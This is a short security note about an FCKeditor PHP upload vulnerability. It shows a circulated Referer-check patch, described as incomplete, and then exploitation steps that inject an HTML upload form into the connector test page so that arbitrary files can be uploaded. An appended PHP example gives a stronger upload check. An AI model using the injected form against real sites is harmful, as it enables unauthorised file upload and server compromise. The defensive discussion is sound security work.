Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix circulated online is as follows.
Fix: remove the FCK editor and use a different editor,
or locate the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below the lines
require('config.php');
require('util.php');
add the following code:
//Prevent external submissions
function outsidepost()
{
    $servername=$_SERVER['SERVER_NAME'];
    $sub_from=@$_SERVER['HTTP_REFERER'];
    $sub_len=strlen($servername);
    // Skip the 7 characters of "http://" and take the host part of the Referer
    $checkfrom=substr($sub_from,7,$sub_len);
    if($checkfrom!=$servername){
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This blocks submissions from outside the site, but it does not block submissions made from within the site.
Exploitation:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then use Get Folders and Files; an upload form appears, through which any file type can be uploaded.
PS: If the editors directory and the upload folder are set to return 403, 500 or 404, the exploit does not work.
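
A server-side upload check that does not rely on the Referer header, as an added example (not code from the original post or from FCKeditor). The function name, the session key and the extension allowlist are assumptions chosen for illustration.

```php
<?php
// Added example: hypothetical names throughout, not FCKeditor's own code.

// Assumption: the site stores an authenticated-editor flag in the session.
const SESSION_FLAG = 'is_editor';
// Assumption: only these media types are needed by the site.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'mp3', 'mp4'];

/**
 * Decide whether an upload may be stored. Returns [bool $ok, string $detail]:
 * on success $detail is the server-chosen file name, otherwise the reason.
 */
function check_upload(array $session, array $file): array
{
    // Authorisation comes from server-side session state, not from the
    // Referer header, which a same-site page can satisfy.
    if (empty($session[SESSION_FLAG])) {
        return [false, 'not authenticated'];
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error'];
    }
    // Every dot-separated part after the base name must be allowlisted, so
    // "x.php.jpg" is rejected as well as "x.php".
    $parts = explode('.', strtolower(basename($file['name'])));
    array_shift($parts);
    if ($parts === [] || array_diff($parts, ALLOWED_EXT) !== []) {
        return [false, 'file type not allowed'];
    }
    // Never reuse the client-supplied name on disk.
    return [true, bin2hex(random_bytes(16)) . '.' . end($parts)];
}

// Constructed sample inputs (session array, $_FILES-style entry).
$samples = [
    [[], ['name' => 'a.jpg', 'error' => UPLOAD_ERR_OK]],
    [[SESSION_FLAG => true], ['name' => 'x.php', 'error' => UPLOAD_ERR_OK]],
    [[SESSION_FLAG => true], ['name' => 'x.php.jpg', 'error' => UPLOAD_ERR_OK]],
    [[SESSION_FLAG => true], ['name' => 'photo.JPG', 'error' => UPLOAD_ERR_OK]],
];
foreach ($samples as [$session, $file]) {
    [$ok, $detail] = check_upload($session, $file);
    printf("%-10s %s %s\n", $file['name'], $ok ? 'ACCEPT' : 'REJECT', $detail);
}
```

In a real upload handler the caller would still confirm the temporary file with is_uploaded_file() and store it with move_uploaded_file() under the returned name.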